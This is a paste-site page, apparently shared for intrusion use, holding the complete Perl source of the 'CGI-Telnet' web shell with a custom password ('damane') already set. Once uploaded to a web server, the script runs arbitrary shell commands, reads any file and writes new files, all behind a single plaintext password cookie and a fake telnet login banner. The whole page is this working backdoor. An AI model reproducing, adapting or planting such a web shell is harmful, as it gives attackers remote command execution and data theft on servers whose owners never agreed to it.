dam

From RubberDuck, 4 Years ago, written in Perl, viewed 842 times.
URL http://paste.security-portal.cz/view/b99d28b5 Embed
Download Paste or View Raw
  1. #!/usr/bin/perl -I/usr/local/bandmain
  2. #------------------------------------------------------------------------------
  3. # Copyright and Licence
  4. #------------------------------------------------------------------------------
  5. # CGI-Telnet Version 1.0 for NT and Unix : Run Commands on your Web Server
  6. #
  7. # Copyright (C) 2001 Rohitab Batra
  8. # Permission is granted to use, distribute and modify this script so long
  9. # as this copyright notice is left intact. If you make changes to the script
  10. # please document them and inform me. If you would like any changes to be made
  11. # in this script, you can e-mail me.
  12. #
  13. # Author: Rohitab Batra
  14. # Author e-mail: rohitab@rohitab.com
  15. # Author Homepage: http://www.rohitab.com/
  16. # Script Homepage: http://www.rohitab.com/cgiscripts/cgitelnet.html
  17. # Product Support: http://www.rohitab.com/support/
  18. # Discussion Forum: http://www.rohitab.com/discuss/
  19. # Mailing List: http://www.rohitab.com/mlist/
  20. #------------------------------------------------------------------------------
  21.  
  22. #------------------------------------------------------------------------------
  23. # Installation
  24. #------------------------------------------------------------------------------
  25. # To install this script
  26. #
  27. # 1. Modify the first line "#!/usr/bin/perl" to point to the correct path on
  28. #    your server. For most servers, you may not need to modify this.
  29. # 2. Change the password in the Configuration section below.
  30. # 3. If you're running the script under Windows NT, set $WinNT = 1 in the
  31. #    Configuration Section below.
  32. # 4. Upload the script to a directory on your server which has permissions to
  33. #    execute CGI scripts. This is usually cgi-bin. Make sure that you upload
  34. #    the script in ASCII mode.
  35. # 5. Change the permission (CHMOD) of the script to 755.
  36. # 6. Open the script in your web browser. If you uploaded the script in
  37. #    cgi-bin, this should be http://www.yourserver.com/cgi-bin/cgitelnet.pl
  38. # 7. Login using the password that you specified in Step 2.
  39. #------------------------------------------------------------------------------
  40.  
  41. #------------------------------------------------------------------------------
  42. # Configuration: You need to change only $Password and $WinNT. The other
  43. # values should work fine for most systems.
  44. #------------------------------------------------------------------------------
  45. $Password = "damane";           # Change this. You will need to enter this
  46.                                 # to login.
  47.  
  48. $WinNT = 0;                     # You need to change the value of this to 1 if
  49.                                 # you're running this script on a Windows NT
  50.                                 # machine. If you're running it on Unix, you
  51.                                 # can leave the value as it is.
  52.  
  53. $NTCmdSep = "&";                # This character is used to seperate 2 commands
  54.                                 # in a command line on Windows NT.
  55.  
  56. $UnixCmdSep = ";";              # This character is used to seperate 2 commands
  57.                                 # in a command line on Unix.
  58.  
  59. $CommandTimeoutDuration = 10;   # Time in seconds after commands will be killed
  60.                                 # Don't set this to a very large value. This is
  61.                                 # useful for commands that may hang or that
  62.                                 # take very long to execute, like "find /".
  63.                                 # This is valid only on Unix servers. It is
  64.                                 # ignored on NT Servers.
  65.  
  66. $ShowDynamicOutput = 1;         # If this is 1, then data is sent to the
  67.                                 # browser as soon as it is output, otherwise
  68.                                 # it is buffered and send when the command
  69.                                 # completes. This is useful for commands like
  70.                                 # ping, so that you can see the output as it
  71.                                 # is being generated.
  72.  
  73. # DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
  74.  
  75. $CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
  76. $CmdPwd = ($WinNT ? "cd" : "pwd");
  77. $PathSep = ($WinNT ? "\\" : "/");
  78. $Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
  79.  
  80. #------------------------------------------------------------------------------
  81. # Reads the input sent by the browser and parses the input variables. It
  82. # parses GET, POST and multipart/form-data that is used for uploading files.
  83. # The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
  84. # Other variables can be accessed using $in{'var'}, where var is the name of
  85. # the variable. Note: Most of the code in this function is taken from other CGI
  86. # scripts.
  87. #------------------------------------------------------------------------------
  88. sub ReadParse
  89. {
  90.         local (*in) = @_ if @_;
  91.         local ($i, $loc, $key, $val);
  92.        
  93.         $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
  94.  
  95.         if($ENV{'REQUEST_METHOD'} eq "GET")
  96.         {
  97.                 $in = $ENV{'QUERY_STRING'};
  98.         }
  99.         elsif($ENV{'REQUEST_METHOD'} eq "POST")
  100.         {
  101.                 binmode(STDIN) if $MultipartFormData & $WinNT;
  102.                 read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
  103.         }
  104.  
  105.         # handle file upload data
  106.         if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
  107.         {
  108.                 $Boundary = '--'.$1; # please refer to RFC1867
  109.                 @list = split(/$Boundary/, $in);
  110.                 $HeaderBody = $list[1];
  111.                 $HeaderBody =~ /\r\n\r\n|\n\n/;
  112.                 $Header = $`;
  113.                 $Body = $';
  114.                 $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
  115.                 $in{'filedata'} = $Body;
  116.                 $Header =~ /filename=\"(.+)\"/;
  117.                 $in{'f'} = $1;
  118.                 $in{'f'} =~ s/\"//g;
  119.                 $in{'f'} =~ s/\s//g;
  120.  
  121.                 # parse trailer
  122.                 for($i=2; $list[$i]; $i++)
  123.                 {
  124.                         $list[$i] =~ s/^.+name=$//;
  125.                         $list[$i] =~ /\"(\w+)\"/;
  126.                         $key = $1;
  127.                         $val = $';
  128.                         $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
  129.                         $val =~ s/%(..)/pack("c", hex($1))/ge;
  130.                         $in{$key} = $val;
  131.                 }
  132.         }
  133.         else # standard post data (url encoded, not multipart)
  134.         {
  135.                 @in = split(/&/, $in);
  136.                 foreach $i (0 .. $#in)
  137.                 {
  138.                         $in[$i] =~ s/\+/ /g;
  139.                         ($key, $val) = split(/=/, $in[$i], 2);
  140.                         $key =~ s/%(..)/pack("c", hex($1))/ge;
  141.                         $val =~ s/%(..)/pack("c", hex($1))/ge;
  142.                         $in{$key} .= "\0" if (defined($in{$key}));
  143.                         $in{$key} .= $val;
  144.                 }
  145.         }
  146. }
  147.  
  148. #------------------------------------------------------------------------------
  149. # Prints the HTML Page Header
  150. # Argument 1: Form item name to which focus should be set
  151. #------------------------------------------------------------------------------
  152. sub PrintPageHeader
  153. {
  154.         $EncodedCurrentDir = $CurrentDir;
  155.         $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  156.         print "Content-type: text/html\n\n";
  157.         print <<END;
  158. <html>
  159. <head>
  160. <title>CGI-Telnet Version 1.0</title>
  161. $HtmlMetaHeader
  162. </head>
  163. <body onLoad="document.f.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
  164. <table border="1" width="100%" cellspacing="0" cellpadding="2">
  165. <tr>
  166. <td bgcolor="#C2BFA5" bordercolor="#000080" align="center">
  167. <b><font color="#000080" size="2">#</font></b></td>
  168. <td bgcolor="#000080"><font face="Verdana" size="2" color="#FFFFFF"><b>CGI-Telnet Version 1.0 - Connected to $ServerName</b></font></td>
  169. </tr>
  170. <tr>
  171. <td colspan="2" bgcolor="#C2BFA5"><font face="Verdana" size="2">
  172. <a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> |
  173. <a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
  174. <a href="$ScriptLocation?a=logout">Disconnect</a> |
  175. <a href="http://www.rohitab.com/cgiscripts/cgitelnet.html">Help</a>
  176. </font></td>
  177. </tr>
  178. </table>
  179. <font color="#C0C0C0" size="3">
  180. END
  181. }
  182.  
  183. #------------------------------------------------------------------------------
  184. # Prints the Login Screen
  185. #------------------------------------------------------------------------------
  186. sub PrintLoginScreen
  187. {
  188.         $Message = q$<pre><font color="#669999"> _____  _____  _____          _____        _               _
  189. /  __ \|  __ \|_   _|        |_   _|      | |             | |
  190. | /  \/| |  \/  | |   ______   | |    ___ | | _ __    ___ | |_
  191. | |    | | __   | |  |______|  | |   / _ \| || '_ \  / _ \| __|
  192. | \__/\| |_\ \ _| |_           | |  |  __/| || | | ||  __/| |_
  193.  \____/ \____/ \___/           \_/   \___||_||_| |_| \___| \__| 1.0
  194.                                          
  195. </font><font color="#FF0000">                      ______             </font><font color="#AE8300">© 2001, Rohitab Batra</font><font color="#FF0000">
  196.                    .-&quot;      &quot;-.
  197.                   /            \
  198.                  |              |
  199.                  |,  .-.  .-.  ,|
  200.                  | )(_o/  \o_)( |
  201.                  |/     /\     \|
  202.        (@_       (_     ^^     _)
  203.   _     ) \</font><font color="#808080">_______</font><font color="#FF0000">\</font><font color="#808080">__</font><font color="#FF0000">|IIIIII|</font><font color="#808080">__</font><font color="#FF0000">/</font><font color="#808080">_______________________
  204. </font><font color="#FF0000"> (_)</font><font color="#808080">@8@8</font><font color="#FF0000">{}</font><font color="#808080">&lt;________</font><font color="#FF0000">|-\IIIIII/-|</font><font color="#808080">________________________&gt;</font><font color="#FF0000">
  205.         )_/        \          /
  206.        (@           `--------`
  207.              </font><font color="#AE8300">W A R N I N G: Private Server</font></pre>
  208. $;
  209. #'
  210.         print <<END;
  211. <code>
  212. Trying $ServerName...<br>
  213. Connected to $ServerName<br>
  214. Escape character is ^]
  215. <code>$Message
  216. END
  217. }
  218.  
  219. #------------------------------------------------------------------------------
  220. # Prints the message that informs the user of a failed login
  221. #------------------------------------------------------------------------------
  222. sub PrintLoginFailedMessage
  223. {
  224.         print <<END;
  225. <code>
  226. <br>login: admin<br>
  227. password:<br>
  228. Login incorrect<br><br>
  229. </code>
  230. END
  231. }
  232.  
  233. #------------------------------------------------------------------------------
  234. # Prints the HTML form for logging in
  235. #------------------------------------------------------------------------------
  236. sub PrintLoginForm
  237. {
  238.         print <<END;
  239. <code>
  240. <form name="f" method="POST" action="$ScriptLocation">
  241. <input type="hidden" name="a" value="login">
  242. login: admin<br>
  243. password:<input type="password" name="p">
  244. <input type="submit" value="Enter">
  245. </form>
  246. </code>
  247. END
  248. }
  249.  
  250. #------------------------------------------------------------------------------
  251. # Prints the footer for the HTML Page
  252. #------------------------------------------------------------------------------
  253. sub PrintPageFooter
  254. {
  255.         print "</font></body></html>";
  256. }
  257.  
  258. #------------------------------------------------------------------------------
  259. # Retreives the values of all cookies. The cookies can be accesses using the
  260. # variable $Cookies{''}
  261. #------------------------------------------------------------------------------
  262. sub GetCookies
  263. {
  264.         @httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
  265.         foreach $cookie(@httpcookies)
  266.         {
  267.                 ($id, $val) = split(/=/, $cookie);
  268.                 $Cookies{$id} = $val;
  269.         }
  270. }
  271.  
  272. #------------------------------------------------------------------------------
  273. # Prints the screen when the user logs out
  274. #------------------------------------------------------------------------------
  275. sub PrintLogoutScreen
  276. {
  277.         print "<code>Connection closed by foreign host.<br><br></code>";
  278. }
  279.  
  280. #------------------------------------------------------------------------------
  281. # Logs out the user and allows the user to login again
  282. #------------------------------------------------------------------------------
  283. sub PerformLogout
  284. {
  285.         print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
  286.         &PrintPageHeader("p");
  287.         &PrintLogoutScreen;
  288.         &PrintLoginScreen;
  289.         &PrintLoginForm;
  290.         &PrintPageFooter;
  291. }
  292.  
  293. #------------------------------------------------------------------------------
  294. # This function is called to login the user. If the password matches, it
  295. # displays a page that allows the user to run commands. If the password doens't
  296. # match or if no password is entered, it displays a form that allows the user
  297. # to login
  298. #------------------------------------------------------------------------------
  299. sub PerformLogin
  300. {
  301.         if($LoginPassword eq $Password) # password matched
  302.         {
  303.                 print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
  304.                 &PrintPageHeader("c");
  305.                 &PrintCommandLineInputForm;
  306.                 &PrintPageFooter;
  307.         }
  308.         else # password didn't match
  309.         {
  310.                 &PrintPageHeader("p");
  311.                 &PrintLoginScreen;
  312.                 if($LoginPassword ne "") # some password was entered
  313.                 {
  314.                         &PrintLoginFailedMessage;
  315.                 }
  316.                 &PrintLoginForm;
  317.                 &PrintPageFooter;
  318.         }
  319. }
  320.  
  321. #------------------------------------------------------------------------------
  322. # Prints the HTML form that allows the user to enter commands
  323. #------------------------------------------------------------------------------
  324. sub PrintCommandLineInputForm
  325. {
  326.         $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
  327.         print <<END;
  328. <code>
  329. <form name="f" method="POST" action="$ScriptLocation">
  330. <input type="hidden" name="a" value="command">
  331. <input type="hidden" name="d" value="$CurrentDir">
  332. $Prompt
  333. <input type="text" name="c">
  334. <input type="submit" value="Enter">
  335. </form>
  336. </code>
  337. END
  338. }
  339.  
  340. #------------------------------------------------------------------------------
  341. # Prints the HTML form that allows the user to download files
  342. #------------------------------------------------------------------------------
  343. sub PrintFileDownloadForm
  344. {
  345.         $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
  346.         print <<END;
  347. <code>
  348. <form name="f" method="POST" action="$ScriptLocation">
  349. <input type="hidden" name="d" value="$CurrentDir">
  350. <input type="hidden" name="a" value="download">
  351. $Prompt download<br><br>
  352. Filename: <input type="text" name="f" size="35"><br><br>
  353. Download: <input type="submit" value="Begin">
  354. </form>
  355. </code>
  356. END
  357. }
  358.  
  359. #------------------------------------------------------------------------------
  360. # Prints the HTML form that allows the user to upload files
  361. #------------------------------------------------------------------------------
  362. sub PrintFileUploadForm
  363. {
  364.         $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
  365.         print <<END;
  366. <code>
  367. <form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
  368. $Prompt upload<br><br>
  369. Filename: <input type="file" name="f" size="35"><br><br>
  370. Options: &nbsp;<input type="checkbox" name="o" value="overwrite">
  371. Overwrite if it Exists<br><br>
  372. Upload:&nbsp;&nbsp;&nbsp;<input type="submit" value="Begin">
  373. <input type="hidden" name="d" value="$CurrentDir">
  374. <input type="hidden" name="a" value="upload">
  375. </form>
  376. </code>
  377. END
  378. }
  379.  
  380. #------------------------------------------------------------------------------
  381. # This function is called when the timeout for a command expires. We need to
  382. # terminate the script immediately. This function is valid only on Unix. It is
  383. # never called when the script is running on NT.
  384. #------------------------------------------------------------------------------
  385. sub CommandTimeout
  386. {
  387.         if(!$WinNT)
  388.         {
  389.                 alarm(0);
  390.                 print <<END;
  391. </xmp>
  392. <code>
  393. Command exceeded maximum time of $CommandTimeoutDuration second(s).
  394. <br>Killed it!
  395. <code>
  396. END
  397.                 &PrintCommandLineInputForm;
  398.                 &PrintPageFooter;
  399.                 exit;
  400.         }
  401. }
  402.  
  403. #------------------------------------------------------------------------------
  404. # This function is called to execute commands. It displays the output of the
  405. # command and allows the user to enter another command. The change directory
  406. # command is handled differently. In this case, the new directory is stored in
  407. # an internal variable and is used each time a command has to be executed. The
  408. # output of the change directory command is not displayed to the users
  409. # therefore error messages cannot be displayed.
  410. #------------------------------------------------------------------------------
  411. sub ExecuteCommand
  412. {
  413.         if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
  414.         {
  415.                 # we change the directory internally. The output of the
  416.                 # command is not displayed.
  417.                
  418.                 $OldDir = $CurrentDir;
  419.                 $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
  420.                 chop($CurrentDir = `$Command`);
  421.                 &PrintPageHeader("c");
  422.                 $Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ ";
  423.                 print "<code>$Prompt $RunCommand</code>";
  424.         }
  425.         else # some other command, display the output
  426.         {
  427.                 &PrintPageHeader("c");
  428.                 $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
  429.                 print "<code>$Prompt $RunCommand</code><xmp>";
  430.                 $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
  431.                 if(!$WinNT)
  432.                 {
  433.                         $SIG{'ALRM'} = \&CommandTimeout;
  434.                         alarm($CommandTimeoutDuration);
  435.                 }
  436.                 if($ShowDynamicOutput) # show output as it is generated
  437.                 {
  438.                         $|=1;
  439.                         $Command .= " |";
  440.                         open(CommandOutput, $Command);
  441.                         while(<CommandOutput>)
  442.                         {
  443.                                 $_ =~ s/(\n|\r\n)$//;
  444.                                 print "$_\n";
  445.                         }
  446.                         $|=0;
  447.                 }
  448.                 else # show output after command completes
  449.                 {
  450.                         print `$Command`;
  451.                 }
  452.                 if(!$WinNT)
  453.                 {
  454.                         alarm(0);
  455.                 }
  456.                 print "</xmp>";
  457.         }
  458.         &PrintCommandLineInputForm;
  459.         &PrintPageFooter;
  460. }
  461.  
  462. #------------------------------------------------------------------------------
  463. # This function displays the page that contains a link which allows the user
  464. # to download the specified file. The page also contains a auto-refresh
  465. # feature that starts the download automatically.
  466. # Argument 1: Fully qualified filename of the file to be downloaded
  467. #------------------------------------------------------------------------------
  468. sub PrintDownloadLinkPage
  469. {
  470.         local($FileUrl) = @_;
  471.         if(-e $FileUrl) # if the file exists
  472.         {
  473.                 # encode the file link so we can send it to the browser
  474.                 $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  475.                 $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
  476.                 $HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
  477.                 &PrintPageHeader("c");
  478.                 print <<END;
  479. <code>
  480. Sending File $TransferFile...<br>
  481. If the download does not start automatically,
  482. <a href="$DownloadLink">Click Here</a>.
  483. </code>
  484. END
  485.                 &PrintCommandLineInputForm;
  486.                 &PrintPageFooter;
  487.         }
  488.         else # file doesn't exist
  489.         {
  490.                 &PrintPageHeader("f");
  491.                 print "<code>Failed to download $FileUrl: $!</code>";
  492.                 &PrintFileDownloadForm;
  493.                 &PrintPageFooter;
  494.         }
  495. }
  496.  
  497. #------------------------------------------------------------------------------
  498. # This function reads the specified file from the disk and sends it to the
  499. # browser, so that it can be downloaded by the user.
  500. # Argument 1: Fully qualified pathname of the file to be sent.
  501. #------------------------------------------------------------------------------
  502. sub SendFileToBrowser
  503. {
  504.         local($SendFile) = @_;
  505.         if(open(SENDFILE, $SendFile)) # file opened for reading
  506.         {
  507.                 if($WinNT)
  508.                 {
  509.                         binmode(SENDFILE);
  510.                         binmode(STDOUT);
  511.                 }
  512.                 $FileSize = (stat($SendFile))[7];
  513.                 ($Filename = $SendFile) =~  m!([^/^\\]*)$!;
  514.                 print "Content-Type: application/x-unknown\n";
  515.                 print "Content-Length: $FileSize\n";
  516.                 print "Content-Disposition: attachment; filename=$1\n\n";
  517.                 print while(<SENDFILE>);
  518.                 close(SENDFILE);
  519.         }
  520.         else # failed to open file
  521.         {
  522.                 &PrintPageHeader("f");
  523.                 print "<code>Failed to download $SendFile: $!</code>";
  524.                 &PrintFileDownloadForm;
  525.                 &PrintPageFooter;
  526.         }
  527. }
  528.  
  529.  
  530. #------------------------------------------------------------------------------
  531. # This function is called when the user downloads a file. It displays a message
  532. # to the user and provides a link through which the file can be downloaded.
  533. # This function is also called when the user clicks on that link. In this case,
  534. # the file is read and sent to the browser.
  535. #------------------------------------------------------------------------------
  536. sub BeginDownload
  537. {
  538.         # get fully qualified path of the file to be downloaded
  539.         if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
  540.                 (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  541.         {
  542.                 $TargetFile = $TransferFile;
  543.         }
  544.         else # path is relative
  545.         {
  546.                 chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  547.                 $TargetFile .= $PathSep.$TransferFile;
  548.         }
  549.  
  550.         if($Options eq "go") # we have to send the file
  551.         {
  552.                 &SendFileToBrowser($TargetFile);
  553.         }
  554.         else # we have to send only the link page
  555.         {
  556.                 &PrintDownloadLinkPage($TargetFile);
  557.         }
  558. }
  559.  
  560. #------------------------------------------------------------------------------
  561. # This function is called when the user wants to upload a file. If the
  562. # file is not specified, it displays a form allowing the user to specify a
  563. # file, otherwise it starts the upload process.
  564. #------------------------------------------------------------------------------
  565. sub UploadFile
  566. {
  567.         # if no file is specified, print the upload form again
  568.         if($TransferFile eq "")
  569.         {
  570.                 &PrintPageHeader("f");
  571.                 &PrintFileUploadForm;
  572.                 &PrintPageFooter;
  573.                 return;
  574.         }
  575.         &PrintPageHeader("c");
  576.  
  577.         # start the uploading process
  578.         print "<code>Uploading $TransferFile to $CurrentDir...<br>";
  579.  
  580.         # get the fullly qualified pathname of the file to be created
  581.         chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
  582.         $TransferFile =~ m!([^/^\\]*)$!;
  583.         $TargetName .= $PathSep.$1;
  584.  
  585.         $TargetFileSize = length($in{'filedata'});
  586.         # if the file exists and we are not supposed to overwrite it
  587.         if(-e $TargetName && $Options ne "overwrite")
  588.         {
  589.                 print "Failed: Destination file already exists.<br>";
  590.         }
  591.         else # file is not present
  592.         {
  593.                 if(open(UPLOADFILE, ">$TargetName"))
  594.                 {
  595.                         binmode(UPLOADFILE) if $WinNT;
  596.                         print UPLOADFILE $in{'filedata'};
  597.                         close(UPLOADFILE);
  598.                         print "Transfered $TargetFileSize Bytes.<br>";
  599.                         print "File Path: $TargetName<br>";
  600.                 }
  601.                 else
  602.                 {
  603.                         print "Failed: $!<br>";
  604.                 }
  605.         }
  606.         print "</code>";
  607.         &PrintCommandLineInputForm;
  608.         &PrintPageFooter;
  609. }
  610.  
  611. #------------------------------------------------------------------------------
  612. # This function is called when the user wants to download a file. If the
  613. # filename is not specified, it displays a form allowing the user to specify a
  614. # file, otherwise it displays a message to the user and provides a link
  615. # through  which the file can be downloaded.
  616. #------------------------------------------------------------------------------
  617. sub DownloadFile
  618. {
  619.         # if no file is specified, print the download form again
  620.         if($TransferFile eq "")
  621.         {
  622.                 &PrintPageHeader("f");
  623.                 &PrintFileDownloadForm;
  624.                 &PrintPageFooter;
  625.                 return;
  626.         }
  627.        
  628.         # get fully qualified path of the file to be downloaded
  629.         if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
  630.                 (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  631.         {
  632.                 $TargetFile = $TransferFile;
  633.         }
  634.         else # path is relative
  635.         {
  636.                 chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  637.                 $TargetFile .= $PathSep.$TransferFile;
  638.         }
  639.  
  640.         if($Options eq "go") # we have to send the file
  641.         {
  642.                 &SendFileToBrowser($TargetFile);
  643.         }
  644.         else # we have to send only the link page
  645.         {
  646.                 &PrintDownloadLinkPage($TargetFile);
  647.         }
  648. }
  649.  
  650. #------------------------------------------------------------------------------
  651. # Main Program - Execution Starts Here
  652. #------------------------------------------------------------------------------
  653. &ReadParse;
  654. &GetCookies;
  655.  
  656. $ScriptLocation = $ENV{'SCRIPT_NAME'};
  657. $ServerName = $ENV{'SERVER_NAME'};
  658. $LoginPassword = $in{'p'};
  659. $RunCommand = $in{'c'};
  660. $TransferFile = $in{'f'};
  661. $Options = $in{'o'};
  662.  
  663. $Action = $in{'a'};
  664. $Action = "login" if($Action eq ""); # no action specified, use default
  665.  
  666. # get the directory in which the commands will be executed
  667. $CurrentDir = $in{'d'};
  668. chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
  669.  
  670. $LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;
  671.  
  672. if($Action eq "login" || !$LoggedIn) # user needs/has to login
  673. {
  674.         &PerformLogin;
  675. }
  676. elsif($Action eq "command") # user wants to run a command
  677. {
  678.         &ExecuteCommand;
  679. }
  680. elsif($Action eq "upload") # user wants to upload a file
  681. {
  682.         &UploadFile;
  683. }
  684. elsif($Action eq "download") # user wants to download a file
  685. {
  686.         &DownloadFile;
  687. }
  688. elsif($Action eq "logout") # user wants to logout
  689. {
  690.         &PerformLogout;
  691. }
  692.  

Replies to dam rss

Title Name Language When
Re: dam Stained Mockingbird perl 3 Years ago.

Reply to "dam"

Here you can reply to the paste above